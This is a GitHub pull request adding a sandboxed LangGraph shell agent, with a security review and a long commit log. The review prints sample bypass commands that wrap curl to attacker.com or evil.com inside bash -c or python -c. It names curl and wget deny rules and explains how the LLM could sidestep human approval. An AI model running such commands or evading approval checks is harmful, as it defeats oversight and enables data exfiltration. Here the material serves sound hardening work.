feat: add sandbox_agent with per-context workspace isolation#126
feat: add sandbox_agent with per-context workspace isolation#126Ladas wants to merge 144 commits intokagenti:mainfrom
Conversation
pdettori
left a comment
There was a problem hiding this comment.
Security & Completeness Review
Three issues identified — two security-critical and one enforcement gap. Details in inline comments below.
a2a/sandbox_agent/settings.json
Outdated
| "shell(tree:*)", "shell(pwd:*)", "shell(mkdir:*)", "shell(cp:*)", | ||
| "shell(mv:*)", "shell(touch:*)", | ||
| "shell(python:*)", "shell(python3:*)", "shell(pip install:*)", | ||
| "shell(pip list:*)", "shell(sh:*)", "shell(bash:*)", |
There was a problem hiding this comment.
🔴 Critical: Shell interpreter allow-rules bypass all deny rules
The allow list grants shell(bash:*), shell(sh:*), shell(python:*), and shell(python3:*) unconditionally. Because _match_shell() in permissions.py performs prefix-only matching on the command string, a command like:
bash -c "curl http://attacker.com/exfil"
python3 -c "import subprocess; subprocess.run(['curl', ...])"will match shell(bash:*) / shell(python3:*) in the allow list, while the deny rules shell(curl:*) and shell(wget:*) only match commands that start with curl or wget. The network(outbound:*) deny rule is typed as network, but the executor only ever calls permission_checker.check("shell", operation) — there is no code path that checks outbound network at the OS/syscall level.
This is a complete sandbox escape: any denied command can be trivially executed as a subprocess of an allowed interpreter.
Suggested fix: Either (a) remove bash/sh/python/python3 from the blanket allow-list and whitelist specific scripts instead, or (b) add recursive argument inspection in _match_shell() for interpreter commands (detecting -c flags, pipe chains, etc.), or (c) use OS-level enforcement (seccomp, network policies) as a second layer.
| try: | ||
| result = await executor.run_shell(command) | ||
| except HitlRequired as exc: | ||
| return f"APPROVAL_REQUIRED: command '{exc.command}' needs human approval." |
There was a problem hiding this comment.
🔴 Critical: HITL has no hard interrupt — LLM can bypass approval
The HitlRequired exception is caught here and converted to a plain string ("APPROVAL_REQUIRED: ...") returned to the LLM. There is no interrupt() call (LangGraph's mechanism for pausing the graph and requiring human input). The graph construction in build_graph() uses tools_condition and ToolNode but never calls interrupt().
This means the agent loop continues after receiving this string, and the LLM is free to:
- Ignore the approval message entirely
- Attempt a workaround command (e.g., rewriting the denied command using an allowed shell interpreter — see Issue 1)
- Simply not relay the approval request to the user
The docstrings in executor.py and permissions.py state that HITL "triggers LangGraph interrupt() for human approval," but the actual implementation relies on LLM self-reporting. This is not a security control — it is advisory at best.
Suggested fix: Replace the except HitlRequired handler with a proper LangGraph interrupt() call that pauses the graph execution and requires explicit human approval before resuming.
| self.ttl_days = ttl_days | ||
|
|
||
| # ------------------------------------------------------------------ | ||
| # Public API |
There was a problem hiding this comment.
🔴 No TTL enforcement or workspace cleanup
ttl_days is accepted here and written into .context.json metadata (line 91), but there is no implementation that ever reads this value back or acts on it. Specifically:
- No cleanup job, eviction logic, or scheduled task
- No
delete_workspace()method exists - No comparison of
created_at + ttl_daysagainst current time disk_usage_bytesis tracked passively but never checked against any quota- The only public methods are
get_workspace_path(),ensure_workspace(), andlist_contexts()
On a shared RWX PVC in a multi-tenant Kubernetes environment, this means workspaces accumulate indefinitely, creating both a resource exhaustion risk and a data retention compliance gap.
Suggested fix: Either (a) implement a cleanup_expired() method and wire it into a CronJob or startup hook, or (b) explicitly document ttl_days as advisory/future-only and add a tracking issue for enforcement.
| entry = managers.get(manager) | ||
| if entry is None: | ||
| return False | ||
| blocked: list[str] = entry.get("blocked_packages", []) |
There was a problem hiding this comment.
🟡 is_package_blocked() and is_git_remote_allowed() are never called in production code
These methods (and is_package_manager_enabled()) are defined and unit-tested but never wired into the executor or graph. In production code, only the following SourcesConfig members are used:
is_web_access_enabled()— called ingraph.py:_make_web_fetch_toolis_domain_allowed()— called ingraph.py:_make_web_fetch_toolmax_execution_time_seconds— used inexecutor.py:_execute
This means:
pip install <blocked-package>will succeed ifshell(pip install:*)is in the allow list — theblocked_packageslist insources.jsonis never consultedgit clone <disallowed-remote>will succeed ifshell(git clone:*)is in the allow list —allowed_remotesinsources.jsonis never checkedmax_memory_mbis also defined but never enforced
The sources.json capability layer was clearly designed as a second enforcement layer, but it is not wired up to the shell execution path.
Suggested fix: Either (a) add pre-execution hooks in the executor that call is_package_blocked() / is_git_remote_allowed() for matching commands, or (b) explicitly document these as "advisory only / planned for future iteration" and file tracking issues.
04f7cd5 to
2816bd3
Compare
…L cleanup, sources enforcement Address all 4 security findings from pdettori's review on PR kagenti#126: 1. Shell interpreter bypass (Critical): Add recursive argument inspection in PermissionChecker.check_interpreter_bypass() to detect -c/-e flags in bash/sh/python invocations. Embedded commands are checked against deny rules, preventing `bash -c "curl ..."` from bypassing `shell(curl:*)` deny rules. 2. HITL no interrupt() (Critical): Replace `except HitlRequired` string return with LangGraph `interrupt()` call that pauses graph execution. The agent cannot continue until a human explicitly approves via the HITLManager channel. 3. No TTL enforcement (Medium): Add `cleanup_expired()` method to WorkspaceManager. Reads created_at + ttl_days from .context.json and deletes expired workspace directories. Add `get_total_disk_usage()`. 4. sources.json not wired (Medium): Add `_check_sources()` pre-hook in SandboxExecutor.run_shell(). Checks pip/npm install commands against blocked_packages list and git clone URLs against allowed_remotes before execution. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Weather agent with ONLY auto-instrumentation - no custom middleware, no observability.py, no root span creation. The AuthBridge ext_proc creates the root span with all MLflow/OpenInference/GenAI attributes. Agent changes from pre-PR-114 baseline: - __init__.py: Add W3C Trace Context propagation + OpenAI auto-instr - agent.py: Remove duplicate LangChainInstrumentor (moved to __init__) - pyproject.toml: Add opentelemetry-instrumentation-openai - Dockerfile: Use Docker Hub base image (GHCR auth fix) Zero custom observability code - all root span attributes come from the AuthBridge ext_proc gRPC server. Refs kagenti/kagenti#667 Signed-off-by: Ladas <lsmola@redhat.com> Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Without ASGI/Starlette instrumentation, the agent's OTEL SDK never reads the traceparent header from incoming HTTP requests. This causes the AuthBridge ext_proc root span and agent LangChain spans to end up in separate disconnected traces. StarletteInstrumentor().instrument() patches Starlette to automatically extract traceparent from incoming requests, making all agent spans children of the ext_proc root span (same trace_id). Refs kagenti/kagenti#667 Signed-off-by: Ladas <lsmola@redhat.com> Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
New LangGraph agent with: - settings.json three-tier permission checker (allow/deny/HITL) - sources.json capability declaration (registries, remotes, limits) - Per-context workspace manager on shared RWX PVC - Sandbox executor with timeout enforcement - Shell, file_read, file_write tools for LangGraph - A2A server with streaming support 68 tests passing. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Agents can now fetch content from URLs whose domain is in the sources.json allowed_domains list (github.com, api.github.com, etc). Blocked domains are checked first. HTML content is stripped to text. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Serialize LangChain messages via model_dump() and json.dumps() instead of Python str(). This produces valid JSON that the ext_proc can parse to extract GenAI semantic convention attributes (token counts, model name, tool names) without regex. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Without a checkpointer, LangGraph discards conversation state between invocations even when the same context_id/thread_id is used. This adds a shared MemorySaver instance to SandboxAgentExecutor and passes the thread_id config to graph.astream() so the checkpointer can route state per conversation thread. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…L cleanup, sources enforcement Address all 4 security findings from pdettori's review on PR kagenti#126: 1. Shell interpreter bypass (Critical): Add recursive argument inspection in PermissionChecker.check_interpreter_bypass() to detect -c/-e flags in bash/sh/python invocations. Embedded commands are checked against deny rules, preventing `bash -c "curl ..."` from bypassing `shell(curl:*)` deny rules. 2. HITL no interrupt() (Critical): Replace `except HitlRequired` string return with LangGraph `interrupt()` call that pauses graph execution. The agent cannot continue until a human explicitly approves via the HITLManager channel. 3. No TTL enforcement (Medium): Add `cleanup_expired()` method to WorkspaceManager. Reads created_at + ttl_days from .context.json and deletes expired workspace directories. Add `get_total_disk_usage()`. 4. sources.json not wired (Medium): Add `_check_sources()` pre-hook in SandboxExecutor.run_shell(). Checks pip/npm install commands against blocked_packages list and git clone URLs against allowed_remotes before execution. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
C19 (multi-conversation isolation):
- Add startup cleanup of expired workspaces via cleanup_expired()
- Wire context_ttl_days from Configuration into WorkspaceManager
C20 (sub-agent spawning via LangGraph):
- Add subagents.py with two spawning modes:
- explore: in-process read-only sub-graph (grep, read_file, list_files)
bounded to 15 iterations, 120s timeout
- delegate: out-of-process SandboxClaim stub for production K8s clusters
- Wire explore and delegate tools into the main agent graph
- Update system prompt with sub-agent tool descriptions
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Address code review findings: 1. Interpreter bypass now routes to HITL when embedded commands are not explicitly denied — prevents auto-allowing unknown commands wrapped in bash -c / sh -c via the outer shell(bash:*) allow rule. 2. Parse &&, ||, ; shell metacharacters in embedded commands, not just pipes. Catches "bash -c 'allowed && curl evil.com'" patterns. 3. Replace str().startswith() path traversal checks with Path.is_relative_to() across graph.py and subagents.py to prevent prefix collision attacks (/workspace vs /workspace-evil). 4. Guard against None approval in interrupt() resume — use isinstance(approval, dict) check. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Add langgraph-checkpoint-postgres and asyncpg dependencies. Agent uses AsyncPostgresSaver when CHECKPOINT_DB_URL is set, falls back to in-memory MemorySaver for dev/test without Postgres. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Replace InMemoryTaskStore with a2a-sdk's DatabaseTaskStore (PostgreSQL) when TASK_STORE_DB_URL is set. This is A2A-generic — works for any agent framework (LangGraph, CrewAI, AG2), not just LangGraph. The A2A SDK persists tasks, messages, artifacts, and contextId at the protocol level. Any A2A agent can adopt this with the same env var. Falls back to InMemoryTaskStore when no DB URL is configured. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Update the A2A agent card name, skill ID, and workspace agent_name from sandbox-assistant/Sandbox Assistant to sandbox-legion/Sandbox Legion. The Python package name (sandbox_agent) stays unchanged as it's an implementation detail, not user-facing. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The DatabaseTaskStore is in a2a.server.tasks, not a2a.server.tasks.sql_store. The incorrect import path caused the agent to silently fall back to InMemoryTaskStore. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
AsyncPostgresSaver.from_conn_string() returns a context manager that can't be used in sync __init__. Instead, create an asyncpg pool and initialize the saver lazily in execute() on first call. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Both asyncpg pool (checkpointer) and SQLAlchemy engine (TaskStore) need SSL disabled when connecting to the in-cluster postgres-sessions StatefulSet which doesn't have TLS configured. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
LangGraph's AsyncPostgresSaver uses psycopg3, not asyncpg. Create AsyncConnectionPool from psycopg_pool and pass to saver. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The from_conn_string context manager properly handles connection pool setup and autocommit for CREATE INDEX CONCURRENTLY. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
ac7ba86 to
36cfc18
Compare
When models like gpt-4o-mini return content as a list of content blocks (text + tool_use), the previous code would stringify the entire list. Now properly extracts only text-type blocks for the final artifact. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- Per-context_id asyncio.Lock serializes graph execution for same conversation (prevents stuck submitted tasks from concurrent requests) - Shell interpreter bypass detection: catches bash -c/python -c patterns and recursively checks inner commands against permissions and sources policy - TOFU verification on startup: hashes CLAUDE.md/sources.json, warns on mismatch (non-blocking) - HITL interrupt() design documented in graph.py with implementation roadmap for graph-level approval flow - Lock cleanup when >1000 idle entries to prevent memory leaks Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Agent now emits structured JSON events instead of Python str()/repr(). Each graph event is serialized with type, tools/name/content fields. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…sk history Agent serializer: when LLM calls tools, also emit its reasoning text as a separate llm_response event before the tool_call. This shows the full chain: thinking → tool_call → tool_result → response. Backend history: aggregate messages across ALL task records for the same context_id. A2A protocol creates immutable tasks per message exchange, so a multi-turn session has N task records. We now merge them in order with user message deduplication. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…nnections Stale asyncpg connections caused 'connection was closed in the middle of operation' errors, breaking SSE streams. Now connections are recycled every 5 min and verified before use. Signed-off-by: Ladislav Smola <lsmola@redhat.com>
… context Three critical fixes for token efficiency: 1. Shell output truncated to 10KB in _format_result(). Large outputs (like gh api responses) no longer blow up the context window. Truncation message tells the agent to redirect to files. 2. Executor messages windowed to last 20. Keeps first user message + recent history instead of entire conversation. Prevents O(N²) token growth across iterations. 3. Reflector now receives last 6 conversation messages alongside its system prompt. Previously it only saw a 1000-char summary of the last step result — now it can see actual tool outputs. 4. Executor system prompt updated with: - Workspace layout (repos/, output/, data/, scripts/) - Large output handling (redirect to files, grep to analyze) - Note that cd doesn't persist between shell calls Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Reflector now walks backwards through messages to find the last 3 AI→Tool pairs, so it sees WHAT command was run (args from AIMessage) alongside the result (from ToolMessage). Previously it only got ToolMessages without knowing what was called. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Replace message-count windowing (20 messages) with token-aware windowing (~30K token budget) to prevent context explosion when individual messages are large. Walk backwards from most recent messages, keeping as many as fit within the budget while always preserving the first user message. Also filter delegate/explore tools from child agent tool lists to prevent recursive sub-agent spawning in _run_in_process. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
_summarize_messages now includes tool call args (truncated to 500 chars)
in the preview, not just tool names. Previously showed
"[tool_calls: shell]" — now shows "shell({"command":"git clone..."})".
This gives both the LLM reflector and the UI inspector visibility
into what was actually executed.
Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
max_iterations stays at 100 (will be looper-level concept). recursion_limit bumped to 2000 so the graph can run deep enough within a single message without hitting GraphRecursionError. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Reflector prompt now shows: - "Current step (1 of 9)" instead of just "Current step (1)" - "Remaining steps: 2. cd repos, 3. list failures, ..." - Decision rules emphasize: only "done" when ALL steps complete Previously the reflector saw "Step completed — all tool calls executed" and interpreted it as the entire task being done, ending after step 1. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Llama 4 Scout frequently confuses "step completed" with "task completed", deciding "done" after step 1 of a 9-step plan. Now programmatically overrides "done" → "continue" when remaining plan steps > 0. The reflector can still say "done" when all steps are complete (remaining = 0) or when the agent is truly stuck (handled by budget limits). Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The event serializer reads current_step from the node's return value, but the executor never included it. This caused all executor events to emit plan_step=0 regardless of which plan step was actually being executed. Now the executor includes current_step in its result dict. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Added explicit STEP BOUNDARY section to executor system prompt: - Only work on the current step - Stop calling tools when the step is done - Do NOT start the next step — the reflector advances Previously the LLM would see the plan and jump ahead to step 3 while still assigned to step 1. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
New graph flow:
planner → step_selector → executor ⇄ tools → reflector
↓
continue → step_selector
replan → planner
done → reporter
The step_selector is a pure state node (no LLM call) that:
- Finds the next unfinished plan step
- Sets current_step for the executor
- Resets the tool call counter
- Marks the step as "running"
This ensures the executor only works on ONE plan step at a time.
Previously the executor received the full plan and would execute
multiple steps in one burst without returning to the reflector.
Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
step_selector now makes a lightweight LLM call to: - Review plan progress (done/pending/running status) - Write a 2-3 sentence brief for the executor - Include relevant context from recent tool results - Inject the brief via skill_instructions (prepended to executor prompt) Also removed tool_choice="any" — executor must be able to produce text-only responses to signal step completion and return to reflector. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
… without it Without tool_choice="any", Llama 4 Scout writes text descriptions of tool calls AND fabricates their output in the same response, bypassing actual tool execution. The text-tool parser catches the call syntax but can't prevent hallucinated output. Step boundaries are enforced by max_tool_calls_per_step limit which triggers return to reflector → step_selector → next step. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…nv var When SANDBOX_FORCE_TOOL_CHOICE=1 (default), binds tools with tool_choice="any" forcing structured calls. When 0, uses auto mode with text-tool parser fallback. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…G env var maybe_patch_tool_calls now respects SANDBOX_TEXT_TOOL_PARSING=0 to disable text parsing fallback. Default: enabled (1). Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Fix two bugs in the sandbox agent reasoning loop: 1. Reflector assessment echoed system prompt: the event serializer's reflector_decision event contained the full system prompt text as the assessment field instead of the actual LLM decision. The stripping logic was computed but the payload used the raw text. Now detects prompt markers and falls back to the decision word. 2. Executor omitted current_step from early-return paths: when the executor returned early (all steps done, tool call limit, budget exceeded, dedup sentinel, no-tool failure), the return dict lacked current_step. The event serializer defaulted to 0, causing the UI to show plan_step=0 even after step_selector advanced the step. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
When SANDBOX_DEBUG_PROMPTS=0, system_prompt and prompt_messages are excluded from node return dicts, preventing them from being serialized into events. Reduces event size from ~20KB to ~1KB per node visit. Default: on (1) for backward compatibility. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
_DEBUG_PROMPTS used _os.environ but was placed before the 'import os as _os' line, causing NameError on startup. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The event serializer now handles the step_selector node, emitting a step_selector event with current_step, description, and the LLM-generated brief. This makes step transitions visible in the UI. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…ints Early-return paths in executor (budget exceeded) and reflector (_force_done, stall detection, done signal) returned without _system_prompt/_prompt_messages, causing the UI PromptInspector to show "no prompt" for those steps. Fix: include _system_prompt with the termination reason so the UI shows why the step ended without an LLM call. Also add debugging hints for gh CLI flag verification and stderr checking to reduce hallucinated flag errors. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The reporter had a shortcut for single-step plans that passed through
the last message content as the final answer without running the LLM.
This leaked reflector reasoning text ("Since the step result indicates
that...the decision is done") as the user-facing response.
Fix: always run the reporter LLM to produce a proper user-facing
summary of what was accomplished. The only early return is when there
are no step results and no messages at all.
Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
_budget_summary was returned by all node functions but was not declared in SandboxState. LangGraph's typed state drops undeclared fields from the state delta, so budget_update events were never emitted in the SSE stream and never persisted to task metadata. Also add _no_tool_count which was similarly missing. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The stall detector forced "done" after 3 consecutive no-tool-call iterations. But when the executor hits MAX_TOOL_CALLS_PER_STEP, it returns a text-only "reached tool call limit" message — the stall detector counted this as a no-tool iteration and prematurely terminated the session. Fix: skip stall detection when the executor's last message indicates the tool call limit was reached. This allows the reflector to properly decide continue/replan instead of force-terminating. Also add _budget_summary and _system_prompt to the tool-limit early return so the UI shows budget data for those steps. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Replace fragmented in-memory token tracking with LiteLLM queries. Before each LLM call, the agent queries the backend's token-usage API for the session's actual total tokens (which includes sub-agents, micro-reasoning, and persists across restarts). Changes: - budget.py: add refresh_from_litellm() that queries the backend API and updates tokens_used from LiteLLM's authoritative count. Cached for 5s to avoid hammering. Falls back to in-memory counter on error. - graph.py: set session_id on budget for LiteLLM queries - reasoning.py: call refresh_from_litellm() before budget checks in all 4 nodes (planner, executor, reflector, reporter) Config: KAGENTI_BACKEND_URL (default: in-cluster service discovery) Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The hardcoded stall detector forced termination after 3 consecutive no-tool-call iterations, overriding the reflector's judgment. This caused premature session termination when the executor was legitimately transitioning between steps or summarizing results. The reflector's LLM call already sees the conversation context and decides continue/replan/done. The iteration limit and wall-clock limit provide sufficient safeguards against runaway loops. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- Add max_session_tokens to LLM request metadata for proxy - Handle 402 budget-exceeded from proxy in all reasoning nodes - Remove refresh_from_litellm() — proxy is now source of truth - Clean up budget.py: remove LiteLLM query code, unused imports - Keep local add_tokens() for budget summary events Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
jq is needed by skills (rca:ci, k8s:logs, etc.) for parsing JSON output from kubectl, gh, and curl commands. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…eneric message When the agent hits its recursion/step limit, the reporter now receives proper context to summarize actual findings: - Force-done marks current step as "partial" (not "failed") for step limits; budget exceeded still marks as "failed" - Reporter prompt includes a NOTE about step limit with count of completed steps - Added rule: "Do NOT say 'The task has been completed'" - Reporter handles PARTIAL status in step summary Previously, hitting the step limit caused the reporter to output "The task has been completed." with no actual findings, even when 26+ tool calls had produced real results. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Token budget is now enforced by the LLM Budget Proxy (returns HTTP 402 when exceeded). The local AgentBudget.exceeded property no longer checks tokens_exceeded — only iterations and wall clock. add_tokens() still tracks in-process usage for budget_update events shown in the UI LoopSummaryBar. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Summary
sandbox_agentLangGraph agent with sandboxed shell executionsettings.jsonthree-tier permission checker (allow/deny/HITL)sources.jsoncapability declaration (registries, remotes, runtime limits)Tests
68 unit tests passing (permissions, sources, workspace, executor, graph)
Design Doc
See
docs/plans/2026-02-14-agent-context-isolation-design.mdin kagenti/kagenti repo🤖 Generated with Claude Code